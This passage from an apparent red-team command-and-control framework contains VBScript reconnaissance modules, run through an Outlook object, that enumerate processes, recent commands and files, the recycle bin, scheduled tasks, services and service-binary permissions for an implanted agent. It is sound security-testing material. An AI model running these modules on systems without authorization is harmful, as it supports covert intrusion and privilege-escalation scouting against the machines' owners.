                    netlogResponse = netlogResponse & netlogAttribute.Name & ": " & Join(netlogAttribute, ", ") & vbCrLf
                else
                    netlogResponse = netlogResponse & netlogAttribute.Name & ": " & netlogAttribute.value & vbCrLf
                end if
            end if
        Next
    Next
    list_networklogon = netlogResponse
End Function
================================================
FILE: functions/enumerate/host/list_ntdomaininfo.py
================================================
from lib.core.specmodule import SpecModule
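class Spec(SpecModule):
    """Module descriptor for ``list_ntdomaininfo``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates information about the domain the computer is joined to using WMI.
Returns unknown if computer is in workgroup.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select * from Win32_NTDomain
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_ntdomaininfo'
        self.depends = []
        super().__init__(templatepath)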
================================================
FILE: functions/enumerate/host/list_ntdomaininfo.txt
================================================
' Dumps every non-empty property of every Win32_NTDomain instance as
' "Name: value" lines.
Function list_ntdomaininfo()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
    Set colNTDomain = objWMIService.ExecQuery("Select * from Win32_NTDomain")
    For Each domain in colNTDomain
        For Each domAttribute in domain.Properties_
            ' Properties whose value is Null or Empty are left out.
            if Not (IsNull(domAttribute.value) OR IsEmpty(domAttribute.value)) Then
                ' NOTE(review): IsArray and Join receive the property object,
                ' not domAttribute.value; whether array-valued properties are
                ' joined as intended depends on default-property resolution -
                ' verify.
                if IsArray(domAttribute) then
                    ntinfo = ntinfo & domAttribute.Name & ": " & Join(domAttribute, ", ") & vbCrLf
                else
                    ntinfo = ntinfo & domAttribute.Name & ": " & domAttribute.value & vbCrLf
                end if
            end if
        Next
    Next
    list_ntdomaininfo = ntinfo
End Function
================================================
FILE: functions/enumerate/host/list_officearch.py
================================================
from lib.core.specmodule import SpecModule
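class Spec(SpecModule):
    """Module descriptor for ``list_officearch``; records the result on the agent."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash is now escaped. The registry path already was;
        # "root\cimv2" relied on the invalid escape "\c" (SyntaxWarning on
        # Python 3.12+). The resulting text is unchanged.
        self.help = """
Enumerates the installed Office Architecture on the host.
This module writes the result to agent in the database.
It retrieves the bitness from the Path value under
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\outlook.exe.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).GetStringValue
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_officearch'
        self.depends = []
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Store the module's returned data on the agent as ``officearch``.

        Args:
            agent: Object that receives the ``officearch`` attribute.
            options: Not used by this handler.
            data: Value assigned to ``agent.officearch`` without any check.
        """
        # NOTE(review): the companion template only ever returns "x86" or
        # "x64", but nothing here enforces that; if data arrives from the
        # remote side unmodified, validate it before anything relies on it.
        agent.officearch = data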
================================================
FILE: functions/enumerate/host/list_officearch.txt
================================================
' Returns "x86" when the Path value registered for outlook.exe under
' App Paths contains "x86", and "x64" in every other case.
Function list_officearch()
    ' Errors are suppressed, so a failed read leaves strPath empty and the
    ' function still answers "x64".
    On Error Resume Next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    ' 2147483650 = &H80000002 = HKEY_LOCAL_MACHINE
    objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\outlook.exe", "Path", strPath
    ' Heuristic on the install path text only; presumably aimed at
    ' "Program Files (x86)" - the binary itself is not inspected.
    if InStr(strPath, "x86") > 0 Then
        list_officearch = "x86"
    else
        list_officearch = "x64"
    end if
End Function
================================================
FILE: functions/enumerate/host/list_printers.py
================================================
from lib.core.specmodule import SpecModule
from datetime import datetime
class Spec(SpecModule):
    """Module descriptor for ``list_printers``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        # Leading and trailing empty entries reproduce the newline that opens
        # and the newline that closes the original help text.
        help_lines = (
            "",
            "Uses wscript.network to gather printer connections",
            "It uses Wscript.Network",
            "- EnumPrinterConnections",
            "",
        )
        self.options = dict()
        self.helpers = helpers
        self.help = "\n".join(help_lines)
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_printers'
        self.depends = list()
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_printers.txt
================================================
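' Lists the printer connections reported by Wscript.Network as
' "Printername: <name> - Port: <port>" lines, preceded by a count.
Function list_printers()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set wsh = window.external.OutlookApplication.CreateObject("Wscript.Network")
    Set printers = wsh.EnumPrinterConnections
    ' The collection alternates port (even index) and printer name (odd
    ' index), hence the step of 2.
    For i = 0 to printers.Count - 1 Step 2
        output = output & "Printername: " & printers.Item(i+1) & " - Port: " & printers.Item(i) & vbCrLf
    Next
    ' Count is the number of collection items, two per printer, so it is
    ' halved to report the number of printers, not of items.
    list_printers = "Found " & (printers.Count \ 2) & " printers:" & vbCrLf & output
End Function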
================================================
FILE: functions/enumerate/host/list_processes.py
================================================
from lib.core.specmodule import SpecModule
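class Spec(SpecModule):
    """Module descriptor for ``list_processes``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        # NOTE(review): the text quotes a 4094967296-byte threshold while the
        # companion template compares VirtualSize with 4000000000; confirm
        # which figure is intended.
        self.help = """
Enumerates running processes on the host.
It lists out:
- PID
- PPID
- Arch based on virtual size (x86 set to less than 4094967296 Bytes, could be FP here) - Double check using operation-file-check_filearch
- Process Name
- Executable Path
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_processes'
        self.depends = []
        super().__init__(templatepath)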
================================================
FILE: functions/enumerate/host/list_processes.txt
================================================
' Returns a tab-separated process table (PID, PPID, Arch, name, executable
' path) built from Win32_Process. Arch is a guess: a virtual size below
' 4000000000 is labelled x86, except for PIDs 0 and 4 and the processes named
' "Memory Compression" and "Registry", which are always labelled x64.
' There is no "On Error Resume Next" here, so a failed connection raises.
Function list_processes()
    Set locator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set wmi = locator.ConnectServer(".", "root\cimv2")
    Set procSet = wmi.ExecQuery ("Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process")
    ' Three tabs separate the process name column from the path column.
    wideGap = vbTab & vbTab & vbTab
    table = "PID" & vbTab & "PPID" & vbTab & "Arch" & vbTab & "ProcessName" & wideGap & "Executable Path" & vbCrLf
    For Each proc in procSet
        If proc.VirtualSize < 4000000000 Then
            arch = "x86"
            ' PIDs 0 and 4 are forced to x64 even with a small virtual size.
            If proc.processid = "0" Or proc.processid = "4" Then arch = "x64"
        Else
            arch = "x64"
        End If
        ' These two process names are forced to x64 as well.
        If proc.Name = "Memory Compression" Or proc.Name = "Registry" Then arch = "x64"
        table = table & proc.ProcessId & vbTab & proc.ParentProcessId & vbTab & arch & vbTab & proc.Name & wideGap & proc.ExecutablePath & vbCrLf
    Next
    list_processes = table
End Function
================================================
FILE: functions/enumerate/host/list_recentcommands.py
================================================
from lib.core.specmodule import SpecModule
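class Spec(SpecModule):
    """Module descriptor for ``list_recentcommands``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash is now escaped. The registry path already was;
        # "root\cimv2" relied on the invalid escape "\c" (SyntaxWarning on
        # Python 3.12+). The resulting text is unchanged.
        self.help = """
Enumerates recent executed commands from the registry
HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
It uses WbemScripting.SWbemNamedValueSet
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumValues
- ConnectServer(root\\cimv2).GetStringValue
- ConnectServer(root\\cimv2).GetExpandedStringValue
- ConnectServer(root\\cimv2).GetBinaryValue
- ConnectServer(root\\cimv2).GetDWORDValue
- ConnectServer(root\\cimv2).GetMultiStringValue
- ConnectServer(root\\cimv2).GetQWORDValue
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_recentcommands'
        # Helper template that provides GetAllRegValues, which the entry function calls.
        self.depends = ['./helperFunctions/Getallregvalues.txt']
        super().__init__(templatepath)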
================================================
FILE: functions/enumerate/host/list_recentcommands.txt
================================================
' Returns the values stored under the current user's Explorer\RunMRU key,
' prefixed with a "RECENT COMMANDS:" header.
' GetAllRegValues comes from the helper template listed in the module's
' depends; its output format is not visible here.
Function list_recentcommands()
    ' Errors are suppressed for the whole function.
    On error resume next
    list_recentcommands = "RECENT COMMANDS:" & vbCrLf
    ' 2147483649 = &H80000001 = HKEY_CURRENT_USER; 64 is passed as the third
    ' argument (presumably the provider architecture - see the helper).
    list_recentcommands = list_recentcommands & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU", 64, 2147483649)
End Function
================================================
FILE: functions/enumerate/host/list_recentfiles.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
    """Module descriptor for ``list_recentfiles``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        # Leading and trailing empty entries reproduce the newline that opens
        # and the newline that closes the original help text.
        help_lines = (
            "",
            "Enumerates all shortcuts in the MY_RECENT_DOCUMENTS / RECENT_FILES",
            "Resolved all shortcuts to the items and lists them out",
            "It uses WScript.Shell",
            "- CreateShortcut",
            "It uses Shell.Application",
            "- Namespace",
            "- Namespace().items",
            "",
        )
        self.options = dict()
        self.helpers = helpers
        self.help = "\n".join(help_lines)
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_recentfiles'
        self.depends = list()
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_recentfiles.txt
================================================
' Lists the target path of every shortcut in the current user's Recent
' folder, one per line, under a "RECENT PATHS:" header.
Function list_recentfiles()
    ' Errors are suppressed for the whole function.
    On error resume next
    ' &H8& = 8, the shell special-folder id passed to Namespace below.
    Const MY_RECENT_DOCUMENTS = &H8&
    recentpaths = "RECENT PATHS:" & vbCrLf
    set WshShell = window.external.OutlookApplication.CreateObject("WScript.Shell")
    Set objShell = window.external.OutlookApplication.CreateObject("Shell.Application")
    Set objFolder = objShell.Namespace(MY_RECENT_DOCUMENTS)
    Set colItems = objFolder.Items
    For Each objItem in colItems
        ' CreateShortcut on an existing .lnk path opens it, which exposes its
        ' TargetPath; nothing is saved here.
        Set oShellLink = WshShell.CreateShortcut(objItem.path)
        ' Items without a target path are skipped (empty Then branch).
        if Len(oShellLink.TargetPath) = 0 then
        else
            recentpaths = recentpaths & oShellLink.TargetPath & vbCrLf
        end if
    Next
    list_recentfiles = recentpaths
End Function
================================================
FILE: functions/enumerate/host/list_recyclebin.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
    """Module descriptor for ``list_recyclebin``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        # Leading and trailing empty entries reproduce the newline that opens
        # and the newline that closes the original help text.
        help_lines = (
            "",
            "This module reads lists the content of the recycle bin",
            "for the current user. To download a file use get_file and",
            "use the long path in the output from this module.",
            'It uses CreateObject("Shell.Application")',
            "",
        )
        self.options = dict()
        self.helpers = helpers
        self.help = "\n".join(help_lines)
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_recyclebin'
        self.depends = list()
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_recyclebin.txt
================================================
' Lists the items in the current user's Recycle Bin as an aligned text table
' with the columns Name, size in MB and full path.
Function list_recyclebin()
    ' Errors are suppressed; a failing statement is skipped and execution continues.
    On error resume next
    Set sa = window.external.OutlookApplication.CreateObject("Shell.Application")
    ' Shell special-folder id 10 is the Recycle Bin (ssfBITBUCKET).
    Set items = sa.Namespace(10).Items()
    output = "Name - MB - FullPath" & vbCrLF
    ' Divisor used to turn the item size into MB (1024 * 1024).
    sizeround = 1048576
    x = 0
    ' First pass: build one " - "-separated row per item.
    Do until x = items.count
        friendlysize = Round(items.item(x).size / sizeround, 1)
        output = output & items.item(x).name & " - " & friendlysize & " - " & items.item(x).path & vbCrLF
        x=x+1
    Loop
    ' ml1..ml3 hold the widest value seen in each of the three columns.
    ml1 = 0
    ml2 = 0
    ml3 = 0
    ' NOTE(review): output ends with vbCrLf, so the last element of lines is an
    ' empty string and the parts(n) accesses for it fail silently.
    lines=split(output,vbcrlf)
    ' Second pass: measure the column widths.
    ' NOTE(review): a name or path that itself contains " - " is split into
    ' extra parts, which shifts the columns for that row.
    for each line in lines
        parts = Split(line, " - ")
        If Len(parts(0)) > ml1 Then
            ml1 = Len(parts(0))
        End If
        If Len(parts(1)) > ml2 Then
            ml2 = Len(parts(1))
        End If
        If Len(parts(2)) > ml3 Then
            ml3 = Len(parts(2))
        End If
    next
    ' Third pass: pad every column to its measured width and append the row to
    ' the return value.
    For Each line In lines
        parts = Split(line, " - ")
        spacesToAdd1 = ml1 - Len(parts(0))
        spacesToAdd2 = ml2 - Len(parts(1))
        spacesToAdd3 = ml3 - Len(parts(2))
        line = parts(0) & String(spacesToAdd1, " ") & " " & parts(1) & String(spacesToAdd2, " ") & " " & parts(2) & String(spacesToAdd3, " ")
        list_recyclebin = list_recyclebin & line & vbCrLF
    Next
End Function
================================================
FILE: functions/enumerate/host/list_scheduledtasks.py
================================================
from lib.core.specmodule import SpecModule
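class Spec(SpecModule):
    """Module descriptor paired with the ``list_scheduledtasks`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Backslashes are written as "\\" so the text holds no invalid escape
        # sequences (a SyntaxWarning on current Python); the resulting string
        # is the same as before.
        self.help = """
Enumerates the scheduled tasks on the host.
It uses WbemScripting.SWbemLocator
- ConnectServer(ROOT\\Microsoft\\Windows\\TaskScheduler)
- Query: SELECT * FROM MSFT_ScheduledTask
"""
        # Same name as the Function defined in list_scheduledtasks.txt.
        self.entry = 'list_scheduledtasks'
        self.depends = []
        super().__init__(templatepath)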
================================================
FILE: functions/enumerate/host/list_scheduledtasks.txt
================================================
' Dumps every scheduled task returned by the MSFT_ScheduledTask WMI class,
' including its actions, principal, settings and triggers, as "Label: value"
' lines. Returns the accumulated text.
Function list_scheduledtasks()
    ' Errors are suppressed; a property that cannot be read or concatenated is
    ' skipped and the dump continues.
    On error resume next
    ' ExecQuery flags: return immediately and use a forward-only enumerator.
    Const wbemFlagReturnImmediately = &h10
    Const wbemFlagForwardOnly = &h20
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' Local machine (".") and the Task Scheduler WMI namespace.
    Set objWMIService = objLocator.ConnectServer(".", "ROOT\Microsoft\Windows\TaskScheduler")
    Set col = objWMIService.ExecQuery ("SELECT * FROM MSFT_ScheduledTask", "WQL", wbemFlagReturnImmediately + wbemFlagForwardOnly)
    For Each objItem in col
        ' Top-level task properties.
        schedtasks = schedtasks & vbCrLf & "TaskName: " & objItem.TaskName
        schedtasks = schedtasks & vbCrLf & "TaskPath: " & objItem.TaskPath
        schedtasks = schedtasks & vbCrLf & "Source: " & objItem.Source
        schedtasks = schedtasks & vbCrLf & "State: " & objItem.State
        schedtasks = schedtasks & vbCrLf & "URI: " & objItem.URI
        schedtasks = schedtasks & vbCrLf & "Author: " & objItem.Author
        schedtasks = schedtasks & vbCrLf & "Date: " & objItem.Date
        schedtasks = schedtasks & vbCrLf & "Description: " & objItem.Description
        ' What the task runs: one group of lines per action.
        schedtasks = schedtasks & vbCrLf & "Actions Details:"
        For Each objAction In objItem.Actions
            schedtasks = schedtasks & vbCrLf & " ClassId: " & objAction.ClassId
            schedtasks = schedtasks & vbCrLf & " Data: " & objAction.Data
            schedtasks = schedtasks & vbCrLf & " Arguments: " & objAction.Arguments
            schedtasks = schedtasks & vbCrLf & " Execute: " & objAction.Execute
        Next
        ' The account and privilege level the task runs with.
        Set objPrincipal = objItem.Principal
        schedtasks = schedtasks & vbCrLf & "Principal Details:"
        schedtasks = schedtasks & vbCrLf & " GroupId: " & objPrincipal.GroupId
        schedtasks = schedtasks & vbCrLf & " Id: " & objPrincipal.Id
        schedtasks = schedtasks & vbCrLf & " LogonType: " & objPrincipal.LogonType
        schedtasks = schedtasks & vbCrLf & " RunLevel: " & objPrincipal.RunLevel
        schedtasks = schedtasks & vbCrLf & " UserId: " & objPrincipal.UserId
        schedtasks = schedtasks & vbCrLf & " ProcessTokenSidType: " & objPrincipal.ProcessTokenSidType
        Set objPrincipal = Nothing
        schedtasks = schedtasks & vbCrLf & "SecurityDescriptor: " & objItem.SecurityDescriptor
        ' Task settings, one line per property.
        Set objSettings = objItem.Settings
        schedtasks = schedtasks & vbCrLf & "Settings Details:"
        schedtasks = schedtasks & vbCrLf & " AllowDemandStart: " & objSettings.AllowDemandStart
        schedtasks = schedtasks & vbCrLf & " AllowHardTerminate: " & objSettings.AllowHardTerminate
        schedtasks = schedtasks & vbCrLf & " Compatibility: " & objSettings.Compatibility
        schedtasks = schedtasks & vbCrLf & " DeleteExpiredTaskAfter: " & objSettings.DeleteExpiredTaskAfter
        schedtasks = schedtasks & vbCrLf & " DisallowStartIfOnBatteries: " & objSettings.DisallowStartIfOnBatteries
        schedtasks = schedtasks & vbCrLf & " Enabled: " & objSettings.Enabled
        schedtasks = schedtasks & vbCrLf & " ExecutionTimeLimit: " & objSettings.ExecutionTimeLimit
        schedtasks = schedtasks & vbCrLf & " Hidden: " & objSettings.Hidden
        ' NOTE(review): IdleSettings looks like an embedded object rather than a
        ' scalar; the concatenation may fail and be skipped - confirm.
        schedtasks = schedtasks & vbCrLf & " IdleSettings: " & objSettings.IdleSettings
        schedtasks = schedtasks & vbCrLf & " MultipleInstances: " & objSettings.MultipleInstances
        schedtasks = schedtasks & vbCrLf & " Priority: " & objSettings.Priority
        schedtasks = schedtasks & vbCrLf & " RestartCount: " & objSettings.RestartCount
        schedtasks = schedtasks & vbCrLf & " RestartInterval: " & objSettings.RestartInterval
        schedtasks = schedtasks & vbCrLf & " RunOnlyIfIdle: " & objSettings.RunOnlyIfIdle
        schedtasks = schedtasks & vbCrLf & " StartWhenAvailable: " & objSettings.StartWhenAvailable
        schedtasks = schedtasks & vbCrLf & " StopIfGoingOnBatteries: " & objSettings.StopIfGoingOnBatteries
        schedtasks = schedtasks & vbCrLf & " WakeToRun: " & objSettings.WakeToRun
        Set objSettings = Nothing
        ' NOTE(review): objItem.Settings was handled as an object just above, so
        ' concatenating it here presumably fails and the line is dropped - confirm.
        schedtasks = schedtasks & vbCrLf & "Settings: " & objItem.Settings
        ' When the task fires: one group of lines per trigger.
        schedtasks = schedtasks & vbCrLf & "Triggers Details:"
        For Each objTrigger In objItem.Triggers
            schedtasks = schedtasks & vbCrLf & " Id: " & objTrigger.Id
            schedtasks = schedtasks & vbCrLf & " RandomDelay: " & objTrigger.RandomDelay
            schedtasks = schedtasks & vbCrLf & " DaysInterval: " & objTrigger.DaysInterval
            schedtasks = schedtasks & vbCrLf & " StartBoundary: " & objTrigger.StartBoundary
            schedtasks = schedtasks & vbCrLf & " Enabled: " & objTrigger.Enabled
            schedtasks = schedtasks & vbCrLf & " StateChange: " & objTrigger.StateChange
            Set objRepetition = objTrigger.Repetition
            schedtasks = schedtasks & vbCrLf & " Repetition Details: "
            schedtasks = schedtasks & vbCrLf & " StopAtDurationEnd: " & objRepetition.StopAtDurationEnd
            schedtasks = schedtasks & vbCrLf & " Duration: " & objRepetition.Duration
            schedtasks = schedtasks & vbCrLf & " Interval: " & objRepetition.Interval
            set objRepetition = Nothing
        Next
        ' Blank line between tasks.
        schedtasks = schedtasks & vbCrLf
    Next
    list_scheduledtasks = schedtasks
End Function
================================================
FILE: functions/enumerate/host/list_servicepermissions.py
================================================
from lib.core.specmodule import SpecModule
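class Spec(SpecModule):
    """Module descriptor paired with the ``list_servicepermissions`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Backslashes are written as "\\" so the text holds no invalid escape
        # sequences (a SyntaxWarning on current Python); the resulting string
        # is the same as before.
        self.help = """
Enumerates the services and the permissions on the host.
It lists out:
- Service Name
- Service Binary path
- Group name and Access
Example Output:
Enumerating Permissions for: UserDataSvc_3dc16
C:\\Windows\\system32\\svchost.exe
GROUP: NT SERVICE\\TRUSTEDINSTALLER
binPath: C:\\Windows\\system32\\svchost.exe
Sanity Check - Access Mask Value To Match: 2032127
ACE Type: Allow
Access Mask (Decimal): 2032127 (FullControl)
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select * from Win32_Service
- Query: Select * from win32_logicalFileSecuritySetting WHERE Path=VARIABLE
"""
        # Same name as the Function defined in list_servicepermissions.txt.
        self.entry = 'list_servicepermissions'
        self.depends = []
        super().__init__(templatepath)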
================================================
FILE: functions/enumerate/host/list_servicepermissions.txt
================================================
' For every Win32_Service, derives the service binary path from PathName and
' lists the DACL entries (trustee, ACE type, access mask) of that file as read
' from Win32_LogicalFileSecuritySetting. Returns the accumulated text.
Function list_servicepermissions()
    ' ACE Types
    Const ACCESS_ALLOWED_ACE_TYPE = &h0
    Const ACCESS_DENIED_ACE_TYPE = &h1
    ' Base Access Mask values
    Const FILE_READ_DATA = &h1
    Const FILE_WRITE_DATA = &h2
    Const FILE_APPEND_DATA = &h4
    Const FILE_READ_EA = &h8
    Const FILE_WRITE_EA = &h10
    Const FILE_EXECUTE = &h20
    Const FILE_DELETE_CHILD = &h40
    Const FILE_READ_ATTRIBUTES = &h80
    Const FILE_WRITE_ATTRIBUTES = &h100
    Const FOLDER_DELETE = &h10000
    Const READ_CONTROL = &h20000
    Const WRITE_DAC = &h40000
    Const WRITE_OWNER = &h80000
    Const SYNCHRONIZE = &h100000
    ' Constructed Access Masks
    ' FULL_CONTROL sums every base right above (decimal 2032127).
    Dim FULL_CONTROL
    FULL_CONTROL = FILE_READ_DATA + FILE_WRITE_DATA + FILE_APPEND_DATA + _
    FILE_READ_EA + FILE_WRITE_EA + FILE_EXECUTE + FILE_DELETE_CHILD + _
    FILE_READ_ATTRIBUTES + FILE_WRITE_ATTRIBUTES + FOLDER_DELETE + _
    READ_CONTROL + WRITE_DAC + WRITE_OWNER + SYNCHRONIZE
    Dim READ_ONLY
    READ_ONLY = FILE_READ_DATA + FILE_READ_EA + FILE_EXECUTE + _
    FILE_READ_ATTRIBUTES + READ_CONTROL + SYNCHRONIZE
    Dim MODIFY
    MODIFY = FILE_READ_DATA + FILE_WRITE_DATA + FILE_APPEND_DATA + _
    FILE_READ_EA + FILE_WRITE_EA + FILE_EXECUTE + _
    FILE_READ_ATTRIBUTES + _
    FILE_WRITE_ATTRIBUTES + FOLDER_DELETE + READ_CONTROL + SYNCHRONIZE
    Dim strRights
    Dim intAccessMask
    ' From here on errors are suppressed; a failing statement is skipped.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
    Set col = objWMIService.ExecQuery ("Select * from Win32_Service")
    For Each objService in col
        ' Cut the command line at the first " ", "-" or "/" (depending on which
        ' marker it contains) to separate the binary from its arguments.
        if InStr(objService.PathName,"{") then
            binarray = split(objService.PathName, " ", -1, 1)
            binpathStr = binarray(0)
        elseif InStr(objService.PathName,"-") then
            binarray = split(objService.PathName, "-", -1, 1)
            binpathStr = binarray(0)
        elseif InStr(objService.PathName,"/") then
            binarray = split(objService.PathName, "/", -1, 1)
            ' NOTE(review): the unquoted value assigned here is overwritten by
            ' the next line.
            binPathStr = Replace(binarray(0), chr(34), "")
            binpathStr = binarray(0)
        else
            binpathStr = objService.PathName
        end if
        ' NOTE(review): this reads binarray(0), not binpathStr. In the Else case
        ' binarray is not reassigned, so it still holds the previous service's
        ' value and the ACL below is reported for the wrong file.
        sanbin = trim(Replace(binarray(0), chr(34), ""))
        toreturn = toreturn & "Enumerating Permissions for: " & objService.Name & vbCrLf
        toreturn = toreturn & sanbin & vbCrLf
        ' Backslashes are doubled because "\" is the escape character inside a
        ' WQL string literal.
        strDir = Replace(sanbin,"\","\\")
        ' The path is concatenated into the query; a path containing a single
        ' quote would break the WHERE clause. 48 = return immediately (&h10) +
        ' forward only (&h20).
        Set colACLs = objWMIService.ExecQuery("Select * from win32_logicalFileSecuritySetting WHERE Path='" & strDir & "'",,48)
        for each objItem in colACLs
            ' objSD receives the security descriptor as an out parameter.
            ' NOTE(review): DisplayFileSecurity is not read anywhere in this
            ' function, so the return value has no effect here.
            If objItem.GetSecurityDescriptor(objSD) Then
                DisplayFileSecurity = False
            End If
            colACEs = objSD.DACL
            for each objACE in colACEs
                ' Trustee as DOMAIN\Name; a leading "\" (empty domain) is removed.
                strAccessList = objACE.Trustee.Domain & "\" & objACE.Trustee.Name
                if left(strAccessList,1) = "\" then
                    strAccessList = right(strAccessList,len(strAccessList) -1)
                end if
                toreturn = toreturn & " GROUP: " & Ucase(strAccessList) & vbCrLf
                toreturn = toreturn & vbTab & "binPath: " & Replace(strDir,"\\","\") & vbCrLf
                if objACE.AceType = 0 Then
                    toreturn = toreturn & vbTab & "Sanity Check - Access Mask Value To Match: " & objACE.AccessMask & vbCrLf
                    ' Inside the AceType = 0 branch this test is always true, so
                    ' the "Deny" line below is not reachable.
                    If objACE.ACEType = ACCESS_ALLOWED_ACE_TYPE Then
                        toreturn = toreturn & vbTab & " ACE Type: Allow" & vbCrLf
                    Else
                        toreturn = toreturn & vbTab & " ACE Type: Deny" & vbCrLf
                    End If
                    ' Only an exact match with one of the three constructed
                    ' masks gets a label; any other mask is printed as a bare
                    ' number.
                    strRights = ""
                    intAccessMask = objACE.AccessMask
                    If intAccessMask = FULL_CONTROL Then
                        strRights = " (FullControl)"
                    ElseIf intAccessMask = MODIFY Then
                        strRights = " (Modify)"
                    ElseIf intAccessMask = READ_ONLY Then
                        strRights = " (ReadOnly)"
                    End If
                    toreturn = toreturn & vbTab & " Access Mask (Decimal): " & intAccessMask & strRights & vbCrLf
                elseif objACE.AceType = 1 Then
                    ' Deny ACE: only the type is reported, not the denied mask.
                    toreturn = toreturn & vbTab & "User does not have access - " & objACE.AceType & vbCrLf
                end if
            Next
        Next
    Next
    list_servicepermissions = toreturn & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_services.py
================================================
from lib.core.specmodule import SpecModule
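class Spec(SpecModule):
    """Module descriptor paired with the ``list_services`` template."""

    def __init__(self, templatepath, helpers):
        """Populate the module metadata, then hand over to ``SpecModule``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The backslash is written as "\\" so the text holds no invalid escape
        # sequence (a SyntaxWarning on current Python); the resulting string is
        # the same as before.
        self.help = """
Enumerates the services and status on the host.
It lists out:
- Service name
- State (Stopped|Started)
- Name (Name of the running account for the service)
- BinPath
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select * from Win32_Service
"""
        # Same name as the Function defined in list_services.txt.
        self.entry = 'list_services'
        self.depends = []
        super().__init__(templatepath)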
================================================
FILE: functions/enumerate/host/list_services.txt
================================================
' Lists every Win32_Service with its state, logon account and command line.
' Returns the accumulated text.
Function list_services()
    ' Errors are suppressed; a failing statement is skipped and execution continues.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' Local machine (".") and the root\cimv2 namespace.
